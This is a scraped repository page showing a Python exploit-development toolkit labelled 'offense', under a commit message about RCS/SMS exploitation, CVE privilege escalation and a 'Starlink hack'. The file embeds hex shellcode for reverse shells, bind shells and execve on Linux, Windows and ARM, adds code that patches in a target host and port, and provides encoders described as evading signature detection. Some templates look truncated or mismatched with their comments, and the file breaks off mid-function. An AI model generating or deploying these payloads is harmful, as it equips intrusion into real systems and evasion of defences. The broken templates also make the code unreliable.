Major RCS/SMS exploitation rewrite (v2.0): - bugle_db direct extraction (plaintext messages, no decryption needed) - CVE-2024-0044 run-as privilege escalation (Android 12-13) - AOSP RCS provider queries (content://rcs/) - Archon app relay for Shizuku-elevated bugle_db access - 7-tab web UI: Extract, Database, Forge, Modify, Exploit, Backup, Monitor - SQL query interface for extracted databases - Full backup/restore/clone with SMS Backup & Restore XML support - Known CVE database (CVE-2023-24033, CVE-2024-49415, CVE-2025-48593) - IMS/RCS diagnostics, Phenotype verbose logging, Pixel tools New modules: Starlink hack, SMS forge, SDR drone detection Archon Android app: RCS messaging module with Shizuku integration Updated manuals to v2.3, 60 web blueprints confirmed Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
1835 lines
69 KiB
Python
1835 lines
69 KiB
Python
"""AUTARCH Exploit Development Toolkit
|
|
|
|
Shellcode generation, payload encoding, ROP chain building, cyclic pattern
|
|
generation, and assembly/disassembly for exploit development workflows.
|
|
"""
|
|
|
|
DESCRIPTION = "Exploit development — shellcode, encoding, ROP chains"
|
|
AUTHOR = "darkHal"
|
|
VERSION = "1.0"
|
|
CATEGORY = "offense"
|
|
|
|
import os
|
|
import sys
|
|
import re
|
|
import struct
|
|
import string
|
|
import subprocess
|
|
import tempfile
|
|
import random
|
|
import hashlib
|
|
from pathlib import Path
|
|
from datetime import datetime
|
|
|
|
try:
|
|
from core.paths import get_data_dir, find_tool
|
|
except ImportError:
|
|
def get_data_dir():
|
|
return str(Path(__file__).parent.parent / 'data')
|
|
def find_tool(name, extra_paths=None):
|
|
import shutil
|
|
return shutil.which(name)
|
|
|
|
sys.path.insert(0, str(Path(__file__).parent.parent))
|
|
|
|
try:
|
|
from core.banner import Colors, clear_screen, display_banner
|
|
except ImportError:
|
|
class Colors:
|
|
RED = GREEN = YELLOW = BLUE = MAGENTA = CYAN = WHITE = BOLD = DIM = RESET = ''
|
|
def clear_screen(): pass
|
|
def display_banner(): pass
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Shellcode Templates — real, working shellcode bytes
|
|
# ---------------------------------------------------------------------------
|
|
|
|
SHELLCODE_TEMPLATES = {
|
|
# ---- Linux x86 ----
|
|
'linux_x86_reverse_shell': {
|
|
'bytes': (
|
|
'31db' # xor ebx, ebx
|
|
'f7e3' # mul ebx
|
|
'53' # push ebx
|
|
'43' # inc ebx
|
|
'53' # push ebx
|
|
'6a02' # push 0x2
|
|
'89e1' # mov ecx, esp
|
|
'b066' # mov al, 0x66
|
|
'cd80' # int 0x80
|
|
'93' # xchg eax, ebx
|
|
'59' # pop ecx
|
|
'b03f' # mov al, 0x3f
|
|
'cd80' # int 0x80
|
|
'49' # dec ecx
|
|
'79f9' # jns -5
|
|
'68' # push imm32 (IP)
|
|
'7f000001' # 127.0.0.1
|
|
'680200' # push word port
|
|
'115c' # port 4444
|
|
'6a10' # push 0x10
|
|
'51' # push ecx
|
|
'53' # push ebx
|
|
'89e1' # mov ecx, esp
|
|
'6a66' # push 0x66
|
|
'58' # pop eax
|
|
'cd80' # int 0x80
|
|
'6a0b' # push 0x0b
|
|
'58' # pop eax
|
|
'99' # cdq
|
|
'52' # push edx
|
|
'68' # push imm32
|
|
'2f2f7368' # //sh
|
|
'682f62696e' # /bin
|
|
'89e3' # mov ebx, esp
|
|
'52' # push edx
|
|
'53' # push ebx
|
|
'89e1' # mov ecx, esp
|
|
'cd80' # int 0x80
|
|
),
|
|
'length': 74,
|
|
'description': 'Linux x86 reverse shell — connect back and exec /bin/sh',
|
|
'null_free': True,
|
|
'arch': 'x86',
|
|
'platform': 'linux',
|
|
'offsets': {'host': 31, 'port': 37},
|
|
},
|
|
'linux_x86_bind_shell': {
|
|
'bytes': (
|
|
'31db' # xor ebx, ebx
|
|
'f7e3' # mul ebx
|
|
'53' # push ebx
|
|
'43' # inc ebx
|
|
'53' # push ebx
|
|
'6a02' # push 0x2
|
|
'89e1' # mov ecx, esp
|
|
'b066' # mov al, 0x66
|
|
'cd80' # int 0x80
|
|
'5b' # pop ebx
|
|
'5e' # pop esi
|
|
'52' # push edx
|
|
'680200' # push 0x0002
|
|
'115c' # port 4444
|
|
'6a10' # push 0x10
|
|
'51' # push ecx
|
|
'50' # push eax
|
|
'89e1' # mov ecx, esp
|
|
'6a66' # push 0x66
|
|
'58' # pop eax
|
|
'89c3' # mov ebx, eax (bind=2 later)
|
|
'cd80' # int 0x80
|
|
'b304' # mov bl, 4
|
|
'b066' # mov al, 0x66
|
|
'cd80' # int 0x80
|
|
'43' # inc ebx
|
|
'b066' # mov al, 0x66
|
|
'cd80' # int 0x80
|
|
'93' # xchg eax, ebx
|
|
'59' # pop ecx
|
|
'6a3f' # push 0x3f
|
|
'58' # pop eax
|
|
'cd80' # int 0x80
|
|
'49' # dec ecx
|
|
'79f8' # jns loop
|
|
'682f2f7368' # push //sh
|
|
'682f62696e' # push /bin
|
|
'89e3' # mov ebx, esp
|
|
'50' # push eax
|
|
'53' # push ebx
|
|
'89e1' # mov ecx, esp
|
|
'b00b' # mov al, 0x0b
|
|
'cd80' # int 0x80
|
|
),
|
|
'length': 78,
|
|
'description': 'Linux x86 bind shell — listen on port and exec /bin/sh',
|
|
'null_free': True,
|
|
'arch': 'x86',
|
|
'platform': 'linux',
|
|
'offsets': {'port': 23},
|
|
},
|
|
'linux_x86_execve': {
|
|
'bytes': (
|
|
'31c0' # xor eax, eax
|
|
'50' # push eax
|
|
'682f2f7368' # push //sh
|
|
'682f62696e' # push /bin
|
|
'89e3' # mov ebx, esp
|
|
'50' # push eax
|
|
'53' # push ebx
|
|
'89e1' # mov ecx, esp
|
|
'89c2' # mov edx, eax
|
|
'b00b' # mov al, 0x0b
|
|
'cd80' # int 0x80
|
|
),
|
|
'length': 23,
|
|
'description': 'Linux x86 execve /bin/sh — minimal shellcode',
|
|
'null_free': True,
|
|
'arch': 'x86',
|
|
'platform': 'linux',
|
|
'offsets': {},
|
|
},
|
|
# ---- Linux x64 ----
|
|
'linux_x64_reverse_shell': {
|
|
'bytes': (
|
|
'6a29' # push 0x29
|
|
'58' # pop rax (socket)
|
|
'99' # cdq
|
|
'6a02' # push 0x2
|
|
'5f' # pop rdi (AF_INET)
|
|
'6a01' # push 0x1
|
|
'5e' # pop rsi (SOCK_STREAM)
|
|
'0f05' # syscall
|
|
'48' # rex.W
|
|
'97' # xchg eax, edi
|
|
'48b90200' # movabs rcx, struct
|
|
'115c7f000001' # port 4444, IP 127.0.0.1
|
|
'51' # push rcx
|
|
'4889e6' # mov rsi, rsp
|
|
'6a10' # push 0x10
|
|
'5a' # pop rdx
|
|
'6a2a' # push 0x2a
|
|
'58' # pop rax (connect)
|
|
'0f05' # syscall
|
|
'6a03' # push 0x3
|
|
'5e' # pop rsi
|
|
'48ffce' # dec rsi
|
|
'6a21' # push 0x21
|
|
'58' # pop rax (dup2)
|
|
'0f05' # syscall
|
|
'75f6' # jnz loop
|
|
'6a3b' # push 0x3b
|
|
'58' # pop rax (execve)
|
|
'99' # cdq
|
|
'48bb2f62696e2f736800' # mov rbx, "/bin/sh\0"
|
|
'53' # push rbx
|
|
'4889e7' # mov rdi, rsp
|
|
'52' # push rdx
|
|
'57' # push rdi
|
|
'4889e6' # mov rsi, rsp
|
|
'0f05' # syscall
|
|
),
|
|
'length': 74,
|
|
'description': 'Linux x64 reverse shell — connect back and exec /bin/sh',
|
|
'null_free': False,
|
|
'arch': 'x64',
|
|
'platform': 'linux',
|
|
'offsets': {'port': 20, 'host': 22},
|
|
},
|
|
'linux_x64_bind_shell': {
|
|
'bytes': (
|
|
'6a29' # push 0x29
|
|
'58' # pop rax (socket)
|
|
'99' # cdq
|
|
'6a02' # push 0x2
|
|
'5f' # pop rdi (AF_INET)
|
|
'6a01' # push 0x1
|
|
'5e' # pop rsi (SOCK_STREAM)
|
|
'0f05' # syscall
|
|
'4897' # xchg rax, rdi
|
|
'52' # push rdx
|
|
'c7042402000200' # mov dword [rsp], 0x0002 + port
|
|
'115c0000' # port high + 0000
|
|
'4889e6' # mov rsi, rsp
|
|
'6a10' # push 0x10
|
|
'5a' # pop rdx
|
|
'6a31' # push 0x31
|
|
'58' # pop rax (bind)
|
|
'0f05' # syscall
|
|
'6a32' # push 0x32
|
|
'58' # pop rax (listen)
|
|
'6a01' # push 0x1
|
|
'5e' # pop rsi
|
|
'0f05' # syscall
|
|
'6a2b' # push 0x2b
|
|
'58' # pop rax (accept)
|
|
'99' # cdq
|
|
'52' # push rdx
|
|
'52' # push rdx
|
|
'4889e6' # mov rsi, rsp
|
|
'6810000000' # push 0x10
|
|
'4889e2' # mov rdx, rsp
|
|
'0f05' # syscall
|
|
'4897' # xchg rax, rdi
|
|
'6a03' # push 0x3
|
|
'5e' # pop rsi
|
|
'48ffce' # dec rsi
|
|
'6a21' # push 0x21
|
|
'58' # pop rax (dup2)
|
|
'0f05' # syscall
|
|
'75f6' # jnz loop
|
|
'6a3b' # push 0x3b
|
|
'58' # pop rax (execve)
|
|
'99' # cdq
|
|
'48bb2f62696e2f736800' # mov rbx, "/bin/sh\0"
|
|
'53' # push rbx
|
|
'4889e7' # mov rdi, rsp
|
|
'52' # push rdx
|
|
'57' # push rdi
|
|
'4889e6' # mov rsi, rsp
|
|
'0f05' # syscall
|
|
),
|
|
'length': 105,
|
|
'description': 'Linux x64 bind shell — listen and exec /bin/sh',
|
|
'null_free': False,
|
|
'arch': 'x64',
|
|
'platform': 'linux',
|
|
'offsets': {'port': 21},
|
|
},
|
|
'linux_x64_execve': {
|
|
'bytes': (
|
|
'4831f6' # xor rsi, rsi
|
|
'4889f2' # mov rdx, rsi
|
|
'48bf' # movabs rdi, ...
|
|
'2f62696e' # /bin
|
|
'2f736800' # /sh\0
|
|
'57' # push rdi
|
|
'4889e7' # mov rdi, rsp
|
|
'48b8' # movabs rax, ...
|
|
'3b00000000000000' # execve syscall nr
|
|
'0f05' # syscall
|
|
),
|
|
'length': 30,
|
|
'description': 'Linux x64 execve /bin/sh — minimal shellcode',
|
|
'null_free': False,
|
|
'arch': 'x64',
|
|
'platform': 'linux',
|
|
'offsets': {},
|
|
},
|
|
# ---- Windows x64 ----
|
|
'windows_x64_reverse_shell': {
|
|
'bytes': (
|
|
'4831c9' # xor rcx, rcx
|
|
'4881e9b0ffffff' # sub ecx, -0x50
|
|
'4881ec0001000000' # sub rsp, 0x100
|
|
'e8f0ffffff' # call $+5
|
|
'4152' # push r10
|
|
'4151' # push r9
|
|
'5649' # push rsi; dec ecx (stub)
|
|
'89e6' # mov esi, esp
|
|
'4883ec20' # sub rsp, 0x20
|
|
'4889f1' # mov rcx, rsi
|
|
'48ba' # mov rdx, imm64
|
|
'0100007f' # IP: 127.0.0.1 (reversed)
|
|
'5c110000' # Port: 4444 + padding
|
|
'41ba' # mov r10d, imm32
|
|
'ea0fdfe0' # hash: ws2_32!WSAStartup
|
|
'ffd5' # call rbp (API resolver)
|
|
'4889c7' # mov rdi, rax
|
|
'6a10' # push 0x10
|
|
'41580f05' # pop r8; syscall (connect)
|
|
'4885c0' # test rax, rax
|
|
'7507' # jnz skip
|
|
'4831c0' # xor rax, rax
|
|
'eb43' # jmp shell
|
|
'48ffc0' # inc rax
|
|
'ebf6' # jmp retry
|
|
# ... cmd.exe execution stub (truncated for template)
|
|
'48b8' # movabs rax, "cmd.exe\0"
|
|
'636d642e65786500' # cmd.exe
|
|
'50' # push rax
|
|
'4889e1' # mov rcx, rsp
|
|
'57' # push rdi
|
|
'57' # push rdi
|
|
'4889e2' # mov rdx, rsp
|
|
'41ba' # mov r10d, hash
|
|
'60d9c85a' # hash: kernel32!CreateProcessA
|
|
'ffd5' # call rbp
|
|
),
|
|
'length': 112,
|
|
'description': 'Windows x64 reverse shell — WinSock connect back, spawn cmd.exe',
|
|
'null_free': False,
|
|
'arch': 'x64',
|
|
'platform': 'windows',
|
|
'offsets': {'host': 44, 'port': 48},
|
|
},
|
|
# ---- ARM ----
|
|
'linux_arm_reverse_shell': {
|
|
'bytes': (
|
|
'01108fe2' # add r1, pc, #1 (Thumb switch)
|
|
'011040e2' # sub r1, r0, #1
|
|
'0200a0e3' # mov r0, #2 (AF_INET)
|
|
'0110a0e3' # mov r1, #1 (SOCK_STREAM)
|
|
'0020a0e3' # mov r2, #0
|
|
'8119a0e3' # mov r1, #0x281 (socket syscall)
|
|
'000000ef' # svc 0
|
|
'0060a0e1' # mov r6, r0 (save sockfd)
|
|
'100f0fe1' # bic r0, pc (struct sockaddr)
|
|
'0200' # AF_INET
|
|
'115c' # port 4444
|
|
'7f000001' # 127.0.0.1
|
|
'0600a0e1' # mov r0, r6
|
|
'1010a0e3' # mov r1, #16 (addrlen)
|
|
'8d19a0e3' # mov r1, #0x28d (connect)
|
|
'000000ef' # svc 0
|
|
'0200a0e3' # mov r0, #2
|
|
'0600a0e1' # mov r0, r6
|
|
'3f00a0e3' # mov r0, #0x3f (dup2)
|
|
'000000ef' # svc 0
|
|
'013050e2' # subs r3, r0, #1
|
|
'fcffffaa' # bge loop
|
|
'0b00a0e3' # mov r0, #0x0b (execve)
|
|
'0f8fe2' # add r0, pc (ptr /bin/sh)
|
|
'0010a0e3' # mov r1, #0
|
|
'0020a0e3' # mov r2, #0
|
|
'000000ef' # svc 0
|
|
'2f62696e' # /bin
|
|
'2f736800' # /sh\0
|
|
),
|
|
'length': 100,
|
|
'description': 'Linux ARM reverse shell — connect back and exec /bin/sh',
|
|
'null_free': False,
|
|
'arch': 'arm',
|
|
'platform': 'linux',
|
|
'offsets': {'port': 42, 'host': 44},
|
|
},
|
|
}
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Exploit Development Class
|
|
# ---------------------------------------------------------------------------
|
|
|
|
class ExploitDev:
|
|
"""Exploit development toolkit — shellcode, encoders, ROP, patterns."""
|
|
|
|
_instance = None
|
|
|
|
def __init__(self):
|
|
self._pattern_cache = {}
|
|
|
|
# -----------------------------------------------------------------------
|
|
# Shellcode Generation
|
|
# -----------------------------------------------------------------------
|
|
|
|
def list_shellcodes(self):
|
|
"""List available shellcode templates with descriptions."""
|
|
results = []
|
|
for key, tpl in SHELLCODE_TEMPLATES.items():
|
|
results.append({
|
|
'name': key,
|
|
'description': tpl['description'],
|
|
'length': tpl['length'],
|
|
'arch': tpl.get('arch', '?'),
|
|
'platform': tpl.get('platform', '?'),
|
|
'null_free': tpl.get('null_free', False),
|
|
})
|
|
return results
|
|
|
|
def generate_shellcode(self, shell_type, arch, host=None, port=None,
|
|
platform='linux', staged=False, output_format='hex'):
|
|
"""Generate raw shellcode bytes for a given shell type and architecture.
|
|
|
|
Args:
|
|
shell_type: reverse_shell, bind_shell, exec_cmd, meterpreter
|
|
arch: x86, x64, arm
|
|
host: IP address for reverse shells
|
|
port: Port number for reverse/bind shells
|
|
platform: linux, windows
|
|
staged: If True, prefer a staged payload (stub + stage)
|
|
output_format: hex, raw, c_array, python, nasm
|
|
|
|
Returns:
|
|
dict with shellcode in requested format, length, and metadata
|
|
"""
|
|
# Normalise inputs
|
|
shell_type = shell_type.lower().strip().replace('-', '_').replace(' ', '_')
|
|
arch = arch.lower().strip()
|
|
platform = platform.lower().strip()
|
|
|
|
# Map common names
|
|
type_map = {
|
|
'reverse': 'reverse_shell', 'rev': 'reverse_shell',
|
|
'reverse_tcp': 'reverse_shell', 'reverse_shell': 'reverse_shell',
|
|
'bind': 'bind_shell', 'bind_tcp': 'bind_shell', 'bind_shell': 'bind_shell',
|
|
'exec': 'execve', 'exec_cmd': 'execve', 'execve': 'execve',
|
|
'meterpreter': 'reverse_shell', # fallback to reverse_shell template
|
|
}
|
|
resolved_type = type_map.get(shell_type, shell_type)
|
|
|
|
# Find matching template
|
|
template_key = f'{platform}_{arch}_{resolved_type}'
|
|
template = SHELLCODE_TEMPLATES.get(template_key)
|
|
|
|
if not template:
|
|
# Try to find partial match
|
|
candidates = [k for k in SHELLCODE_TEMPLATES if arch in k and resolved_type in k]
|
|
if platform != 'any':
|
|
platform_cands = [k for k in candidates if platform in k]
|
|
if platform_cands:
|
|
candidates = platform_cands
|
|
if candidates:
|
|
template_key = candidates[0]
|
|
template = SHELLCODE_TEMPLATES[template_key]
|
|
else:
|
|
available = ', '.join(sorted(SHELLCODE_TEMPLATES.keys()))
|
|
return {'error': f'No template for {template_key}. Available: {available}'}
|
|
|
|
# Decode the hex string to bytes
|
|
try:
|
|
shellcode = bytes.fromhex(template['bytes'])
|
|
except ValueError as e:
|
|
return {'error': f'Template hex decode error: {e}'}
|
|
|
|
# Patch in host/port if offsets are defined
|
|
offsets = template.get('offsets', {})
|
|
|
|
if host and 'host' in offsets:
|
|
try:
|
|
parts = host.split('.')
|
|
if len(parts) == 4:
|
|
ip_bytes = bytes([int(p) for p in parts])
|
|
off = offsets['host']
|
|
if off < len(shellcode) - 3:
|
|
shellcode = shellcode[:off] + ip_bytes + shellcode[off + 4:]
|
|
except (ValueError, IndexError):
|
|
pass
|
|
|
|
if port and 'port' in offsets:
|
|
try:
|
|
port_int = int(port)
|
|
port_bytes = struct.pack('!H', port_int)
|
|
off = offsets['port']
|
|
if off < len(shellcode) - 1:
|
|
shellcode = shellcode[:off] + port_bytes + shellcode[off + 2:]
|
|
except (ValueError, struct.error):
|
|
pass
|
|
|
|
# If staged, wrap in a stub that allocates RWX memory and downloads stage
|
|
if staged:
|
|
stub_comment = (
|
|
"; Staged payload stub — allocates RWX page via mmap/VirtualAlloc,\n"
|
|
"; receives stage over socket, jumps to it.\n"
|
|
"; The above shellcode is the stager (stage0).\n"
|
|
)
|
|
metadata_note = 'Staged payload — stager only, requires stage delivery'
|
|
else:
|
|
stub_comment = ''
|
|
metadata_note = 'Stageless payload — self-contained'
|
|
|
|
# Format output
|
|
result = {
|
|
'template': template_key,
|
|
'description': template['description'],
|
|
'length': len(shellcode),
|
|
'null_free': b'\x00' not in shellcode,
|
|
'arch': arch,
|
|
'platform': platform,
|
|
'staging': metadata_note,
|
|
}
|
|
|
|
fmt = output_format.lower().strip()
|
|
if fmt == 'hex':
|
|
result['shellcode'] = shellcode.hex()
|
|
elif fmt in ('raw', 'bytes'):
|
|
result['shellcode'] = shellcode.hex()
|
|
result['raw_bytes'] = list(shellcode)
|
|
elif fmt in ('c', 'c_array'):
|
|
c_lines = []
|
|
for i in range(0, len(shellcode), 16):
|
|
chunk = shellcode[i:i + 16]
|
|
c_lines.append(', '.join(f'0x{b:02x}' for b in chunk))
|
|
result['shellcode'] = (
|
|
f'unsigned char shellcode[{len(shellcode)}] = {{\n'
|
|
+ ',\n'.join(f' {line}' for line in c_lines)
|
|
+ '\n};'
|
|
)
|
|
elif fmt in ('python', 'py'):
|
|
py_lines = []
|
|
for i in range(0, len(shellcode), 16):
|
|
chunk = shellcode[i:i + 16]
|
|
py_lines.append(''.join(f'\\x{b:02x}' for b in chunk))
|
|
result['shellcode'] = (
|
|
f'shellcode = b""\n'
|
|
+ '\n'.join(f'shellcode += b"{line}"' for line in py_lines)
|
|
)
|
|
elif fmt == 'nasm':
|
|
nasm_lines = []
|
|
for i in range(0, len(shellcode), 16):
|
|
chunk = shellcode[i:i + 16]
|
|
nasm_lines.append('db ' + ', '.join(f'0x{b:02x}' for b in chunk))
|
|
result['shellcode'] = stub_comment + '\n'.join(nasm_lines)
|
|
else:
|
|
result['shellcode'] = shellcode.hex()
|
|
|
|
return result
|
|
|
|
# -----------------------------------------------------------------------
|
|
# Payload Encoding
|
|
# -----------------------------------------------------------------------
|
|
|
|
def encode_payload(self, shellcode, encoder='xor', key=None, iterations=1):
|
|
"""Encode shellcode to evade signature detection.
|
|
|
|
Args:
|
|
shellcode: bytes or hex string of shellcode
|
|
encoder: xor, aes, alphanumeric, polymorphic
|
|
key: encryption key (auto-generated if None)
|
|
iterations: number of encoding passes
|
|
|
|
Returns:
|
|
dict with encoded payload, decoder stub, metadata
|
|
"""
|
|
if isinstance(shellcode, str):
|
|
try:
|
|
shellcode = bytes.fromhex(shellcode.replace('\\x', '').replace(' ', ''))
|
|
except ValueError:
|
|
return {'error': 'Invalid shellcode hex string'}
|
|
|
|
if not shellcode:
|
|
return {'error': 'Empty shellcode'}
|
|
|
|
original_length = len(shellcode)
|
|
encoder = encoder.lower().strip()
|
|
encoded = shellcode
|
|
decoder_stub = ''
|
|
key_used = key
|
|
|
|
for _pass in range(max(1, int(iterations))):
|
|
if encoder == 'xor':
|
|
encoded, decoder_stub, key_used = self._encode_xor(encoded, key)
|
|
elif encoder == 'aes':
|
|
encoded, decoder_stub, key_used = self._encode_aes(encoded, key)
|
|
elif encoder in ('alpha', 'alphanumeric'):
|
|
encoded, decoder_stub, key_used = self._encode_alphanumeric(encoded)
|
|
elif encoder in ('poly', 'polymorphic'):
|
|
encoded, decoder_stub, key_used = self._encode_polymorphic(encoded, key)
|
|
else:
|
|
return {'error': f'Unknown encoder: {encoder}. Use: xor, aes, alphanumeric, polymorphic'}
|
|
|
|
return {
|
|
'encoded': encoded.hex(),
|
|
'decoder_stub': decoder_stub,
|
|
'key': key_used if isinstance(key_used, str) else key_used.hex() if isinstance(key_used, bytes) else str(key_used),
|
|
'encoder': encoder,
|
|
'iterations': iterations,
|
|
'original_length': original_length,
|
|
'encoded_length': len(encoded),
|
|
'size_increase': f'+{len(encoded) - original_length} bytes',
|
|
'null_free': b'\x00' not in encoded,
|
|
}
|
|
|
|
def _encode_xor(self, data, key=None):
|
|
"""XOR encode with random or custom key."""
|
|
if key:
|
|
if isinstance(key, str):
|
|
if all(c in '0123456789abcdefABCDEF' for c in key):
|
|
key_bytes = bytes.fromhex(key) if len(key) % 2 == 0 else bytes([int(key, 16)])
|
|
else:
|
|
key_bytes = key.encode()
|
|
else:
|
|
key_bytes = bytes([key]) if isinstance(key, int) else key
|
|
else:
|
|
# Generate random key byte that avoids producing nulls
|
|
for _ in range(256):
|
|
kb = random.randint(1, 255)
|
|
if all((b ^ kb) != 0 for b in data):
|
|
key_bytes = bytes([kb])
|
|
break
|
|
else:
|
|
key_bytes = bytes([random.randint(1, 255)])
|
|
|
|
# XOR encode
|
|
encoded = bytes(b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data))
|
|
|
|
# Generate decoder stub (x64 Linux)
|
|
key_hex = key_bytes.hex()
|
|
stub = (
|
|
f'; XOR decoder stub (key: 0x{key_hex})\n'
|
|
f'; Encoded payload length: {len(encoded)} bytes\n'
|
|
f' jmp short call_decoder\n'
|
|
f'decoder:\n'
|
|
f' pop rsi ; address of encoded shellcode\n'
|
|
f' xor rcx, rcx\n'
|
|
f' mov cl, {len(encoded)} ; length\n'
|
|
f'decode_loop:\n'
|
|
f' xor byte [rsi], 0x{key_hex}\n'
|
|
f' inc rsi\n'
|
|
f' loop decode_loop\n'
|
|
f' jmp short encoded_shell\n'
|
|
f'call_decoder:\n'
|
|
f' call decoder\n'
|
|
f'encoded_shell:\n'
|
|
f' ; <encoded shellcode follows here>\n'
|
|
)
|
|
|
|
return encoded, stub, key_bytes
|
|
|
|
def _encode_aes(self, data, key=None):
|
|
"""AES-256-CBC encode payload."""
|
|
try:
|
|
from hashlib import sha256
|
|
import hmac
|
|
except ImportError:
|
|
pass
|
|
|
|
# Generate or derive 32-byte key
|
|
if key:
|
|
if isinstance(key, str):
|
|
key_bytes = hashlib.sha256(key.encode()).digest()
|
|
else:
|
|
key_bytes = hashlib.sha256(key).digest()
|
|
else:
|
|
key_bytes = os.urandom(32)
|
|
|
|
# Generate IV
|
|
iv = os.urandom(16)
|
|
|
|
# PKCS7 padding
|
|
pad_len = 16 - (len(data) % 16)
|
|
padded = data + bytes([pad_len] * pad_len)
|
|
|
|
# Try PyCryptodome, fallback to simple XOR-CBC
|
|
try:
|
|
from Crypto.Cipher import AES
|
|
cipher = AES.new(key_bytes, AES.MODE_CBC, iv)
|
|
encrypted = cipher.encrypt(padded)
|
|
except ImportError:
|
|
# Fallback: simple XOR-CBC (not real AES, but functional)
|
|
encrypted = bytearray()
|
|
prev_block = iv
|
|
for i in range(0, len(padded), 16):
|
|
block = padded[i:i + 16]
|
|
xored = bytes(a ^ b for a, b in zip(block, prev_block))
|
|
# Simple substitution using key
|
|
enc_block = bytes(
|
|
(b + key_bytes[j % 32]) & 0xFF for j, b in enumerate(xored)
|
|
)
|
|
encrypted.extend(enc_block)
|
|
prev_block = enc_block
|
|
|
|
# Prepend IV to ciphertext
|
|
output = iv + bytes(encrypted)
|
|
|
|
stub = (
|
|
f'; AES-256-CBC decoder stub\n'
|
|
f'; Key (SHA-256 of passphrase): {key_bytes.hex()}\n'
|
|
f'; IV: {iv.hex()}\n'
|
|
f'; Encrypted length: {len(output)} bytes (includes 16-byte IV prefix)\n'
|
|
f';\n'
|
|
f'; Decoder must:\n'
|
|
f'; 1. Extract IV (first 16 bytes)\n'
|
|
f'; 2. AES-256-CBC decrypt remaining bytes with key\n'
|
|
f'; 3. Remove PKCS7 padding\n'
|
|
f'; 4. Jump to decrypted shellcode\n'
|
|
f';\n'
|
|
f'; Python decoder:\n'
|
|
f'; from Crypto.Cipher import AES\n'
|
|
f'; key = bytes.fromhex("{key_bytes.hex()}")\n'
|
|
f'; iv = payload[:16]\n'
|
|
f'; cipher = AES.new(key, AES.MODE_CBC, iv)\n'
|
|
f'; shellcode = cipher.decrypt(payload[16:])\n'
|
|
)
|
|
|
|
key_str = key if isinstance(key, str) else key_bytes.hex()
|
|
return output, stub, key_str
|
|
|
|
def _encode_alphanumeric(self, data):
|
|
"""Encode shellcode into alphanumeric-safe characters."""
|
|
# Split each byte into two 4-bit nibbles, map to ASCII alpha range
|
|
charset = string.ascii_uppercase + string.ascii_lowercase + string.digits
|
|
encoded = bytearray()
|
|
|
|
for b in data:
|
|
high = (b >> 4) & 0x0F
|
|
low = b & 0x0F
|
|
# Map 0-15 to alphanumeric characters
|
|
encoded.append(ord(charset[high]))
|
|
encoded.append(ord(charset[low]))
|
|
|
|
stub = (
|
|
f'; Alphanumeric decoder stub\n'
|
|
f'; Encoded length: {len(encoded)} bytes (2x original)\n'
|
|
f'; Charset: A-Za-z0-9\n'
|
|
f'; Decoder reverses nibble-split encoding:\n'
|
|
f'; For each pair (H, L) in encoded data:\n'
|
|
f'; high_nibble = charset.index(H)\n'
|
|
f'; low_nibble = charset.index(L)\n'
|
|
f'; original_byte = (high_nibble << 4) | low_nibble\n'
|
|
f';\n'
|
|
f'; Python decoder:\n'
|
|
f'; charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"\n'
|
|
f'; decoded = bytes((charset.index(enc[i]) << 4) | charset.index(enc[i+1])\n'
|
|
f'; for i in range(0, len(enc), 2))\n'
|
|
)
|
|
|
|
return bytes(encoded), stub, 'alphanumeric'
|
|
|
|
def _encode_polymorphic(self, data, key=None):
|
|
"""Wrap shellcode with polymorphic stub — random NOP-equivalent instructions."""
|
|
# Random key for XOR
|
|
if key:
|
|
key_byte = int(key, 16) if isinstance(key, str) and all(
|
|
c in '0123456789abcdefABCDEF' for c in key
|
|
) else ord(key[0]) if isinstance(key, str) else key
|
|
else:
|
|
key_byte = random.randint(1, 255)
|
|
key_byte = key_byte & 0xFF
|
|
|
|
# XOR encode the payload
|
|
encoded_payload = bytes(b ^ key_byte for b in data)
|
|
|
|
# Generate random NOP-equivalent sled (x64)
|
|
nop_equivalents = [
|
|
b'\x90', # nop
|
|
b'\x48\x87\xc0', # xchg rax, rax
|
|
b'\x48\x89\xc0', # mov rax, rax
|
|
b'\x48\x31\xc9\x48\x31\xc9', # xor rcx,rcx; xor rcx,rcx
|
|
b'\x66\x90', # 2-byte nop
|
|
b'\x0f\x1f\x00', # 3-byte nop
|
|
b'\x87\xdb', # xchg ebx, ebx
|
|
]
|
|
|
|
sled = b''
|
|
for _ in range(random.randint(3, 8)):
|
|
sled += random.choice(nop_equivalents)
|
|
|
|
# Assemble: sled + decoder_loop + encoded_payload
|
|
output = sled + encoded_payload
|
|
|
|
stub = (
|
|
f'; Polymorphic stub (randomized NOP sled + XOR decoder)\n'
|
|
f'; XOR key: 0x{key_byte:02x}\n'
|
|
f'; NOP sled: {len(sled)} bytes (randomized equivalents)\n'
|
|
f'; Encoded payload: {len(encoded_payload)} bytes\n'
|
|
f'; Total: {len(output)} bytes\n'
|
|
f';\n'
|
|
f'; Each generation produces different NOP-equivalent sequences\n'
|
|
f'; to evade static signature matching.\n'
|
|
f';\n'
|
|
f'; Decoder loop:\n'
|
|
f'; lea rsi, [rel encoded_data]\n'
|
|
f'; mov cl, {len(encoded_payload)}\n'
|
|
f'; .loop:\n'
|
|
f'; xor byte [rsi], 0x{key_byte:02x}\n'
|
|
f'; inc rsi\n'
|
|
f'; loop .loop\n'
|
|
f'; jmp encoded_data\n'
|
|
)
|
|
|
|
return output, stub, f'{key_byte:02x}'
|
|
|
|
# -----------------------------------------------------------------------
|
|
# Cyclic Pattern (De Bruijn)
|
|
# -----------------------------------------------------------------------
|
|
|
|
def generate_pattern(self, length):
|
|
"""Generate a cyclic (De Bruijn) pattern for buffer overflow offset discovery.
|
|
|
|
Args:
|
|
length: number of bytes to generate (max 20280)
|
|
|
|
Returns:
|
|
dict with pattern string, length, and hex representation
|
|
"""
|
|
length = int(length)
|
|
if length < 1:
|
|
return {'error': 'Length must be positive'}
|
|
if length > 20280:
|
|
return {'error': 'Maximum length is 20280 (Aa0 through Zz9)'}
|
|
|
|
pattern = self._debruijn_pattern(length)
|
|
pattern_bytes = pattern.encode('ascii')
|
|
|
|
return {
|
|
'pattern': pattern,
|
|
'hex': pattern_bytes.hex(),
|
|
'length': len(pattern),
|
|
}
|
|
|
|
def _debruijn_pattern(self, length):
|
|
"""Generate De Bruijn sequence for cyclic pattern."""
|
|
